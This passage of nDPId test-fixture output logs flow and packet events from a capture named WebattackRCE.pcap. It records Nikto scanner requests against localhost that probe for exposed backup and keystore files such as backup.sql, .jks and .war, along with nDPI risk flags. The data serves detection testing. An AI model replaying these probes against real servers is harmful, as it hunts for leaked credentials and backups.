{"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":187,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276961,"flow_last_seen":1576420276961,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276961,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49918,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":187,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":187,"flow_packet_id":1,"flow_last_seen":1576420276961,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276961,"pkt":"AAAAAAAAAAAAAAAACABFAADFGIxAAEAGI6V\/AAABfwAAAcL+H5DvJyDTt9IC\/IAYAED+uQAAAQEICp1m\/AmdZvwJR0VUIC8xMjcuMC4wLjEud2FyIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":187,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276961,"flow_last_seen":1576420276961,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276961,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49918,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":188,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276964,"flow_last_seen":1576420276964,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276964,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49920,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":188,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":188,"flow_packet_id":1,"flow_last_seen":1576420276964,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276964,"pkt":"AAAAAAAAAAAAAAAACABFAADFxd9AAEAGdlF\/AAABfwAAAcMAH5CFNv2FdhNdEIAYAED+uQAAAQEICp1m\/AudZvwLR0VUIC8xMjcuMC4wLjEud2FyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":188,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276964,"flow_last_seen":1576420276964,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276964,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49920,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":189,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276965,"flow_last_seen":1576420276965,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276965,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49922,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":189,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":189,"flow_packet_id":1,"flow_last_seen":1576420276965,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420276965,"pkt":"AAAAAAAAAAAAAAAACABFAAC95pxAAEAGVZx\/AAABfwAAAcMCH5C3Cd7E92VLp4AYAED+sQAAAQEICp1m\/A2dZvwNR0VUIC8xLnRneiBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":189,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276965,"flow_last_seen":1576420276965,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276965,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49922,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":190,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276966,"flow_last_seen":1576420276966,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276966,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49924,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":190,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":190,"flow_packet_id":1,"flow_last_seen":1576420276966,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420276966,"pkt":"AAAAAAAAAAAAAAAACABFAAC9ujdAAEAGggF\/AAABfwAAAcMEH5BKt4Jt+wc3pIAYAED+sQAAAQEICp1m\/A6dZvwOR0VUIC8xLnRneiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":190,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276966,"flow_last_seen":1576420276966,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276966,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49924,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":191,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276968,"flow_last_seen":1576420276968,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276968,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49926,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":191,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":191,"flow_packet_id":1,"flow_last_seen":1576420276968,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276968,"pkt":"AAAAAAAAAAAAAAAACABFAADA8BJAAEAGTCN\/AAABfwAAAcMGH5DhJMhLysCuKoAYAED+tAAAAQEICp1m\/BCdZvwPR0VUIC8xMjcwLmprcyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":191,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276968,"flow_last_seen":1576420276968,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276968,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49926,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":192,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276969,"flow_last_seen":1576420276969,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276969,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49928,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":192,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":192,"flow_packet_id":1,"flow_last_seen":1576420276969,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276969,"pkt":"AAAAAAAAAAAAAAAACABFAADA1ehAAEAGZk1\/AAABfwAAAcMIH5C08u29Z4prKYAYAED+tAAAAQEICp1m\/BGdZvwRR0VUIC8xMjcwLmprcyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":192,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276969,"flow_last_seen":1576420276969,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276969,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49928,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":193,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276970,"flow_last_seen":1576420276970,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276970,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49930,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":193,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":193,"flow_packet_id":1,"flow_last_seen":1576420276970,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420276970,"pkt":"AAAAAAAAAAAAAAAACABFAADCS3NAAEAG8MB\/AAABfwAAAcMKH5AxI3MswmM4CYAYAED+tgAAAQEICp1m\/BKdZvwSR0VUIC9iYWNrdXAuc3FsIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":193,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276970,"flow_last_seen":1576420276970,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276970,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49930,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":194,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276972,"flow_last_seen":1576420276972,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276972,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49932,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00672{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":194,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":194,"flow_packet_id":1,"flow_last_seen":1576420276972,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420276972,"pkt":"AAAAAAAAAAAAAAAACABFAADCyadAAEAGcox\/AAABfwAAAcMMH5BpA\/H\/vohuZIAYAED+tgAAAQEICp1m\/BSdZvwUR0VUIC9iYWNrdXAuc3FsIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":194,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276972,"flow_last_seen":1576420276972,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276972,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49932,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":195,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276973,"flow_last_seen":1576420276973,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276973,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49934,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":195,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":195,"flow_packet_id":1,"flow_last_seen":1576420276973,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276973,"pkt":"AAAAAAAAAAAAAAAACABFAADA+8hAAEAGQG1\/AAABfwAAAcMOH5CJ5sOeTDtcfYAYAED+tAAAAQEICp1m\/BWdZvwVR0VUIC9zaXRlLmprcyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":195,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276973,"flow_last_seen":1576420276973,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276973,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49934,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":196,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276976,"flow_last_seen":1576420276976,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276976,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49936,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":196,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":196,"flow_packet_id":1,"flow_last_seen":1576420276976,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276976,"pkt":"AAAAAAAAAAAAAAAACABFAADABYdAAEAGNq9\/AAABfwAAAcMQH5AThT3a7QA3zYAYAED+tAAAAQEICp1m\/BidZvwYR0VUIC9zaXRlLmprcyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":196,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276976,"flow_last_seen":1576420276976,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276976,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49936,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":197,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276977,"flow_last_seen":1576420276977,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276977,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49938,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":197,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":197,"flow_packet_id":1,"flow_last_seen":1576420276977,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420276977,"pkt":"AAAAAAAAAAAAAAAACABFAADBYiVAAEAG2g9\/AAABfwAAAcMSH5B68lqAEiH3Y4AYAED+tQAAAQEICp1m\/BmdZvwZR0VUIC8xMjcuMC56aXAgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":197,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276977,"flow_last_seen":1576420276977,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276977,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49938,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 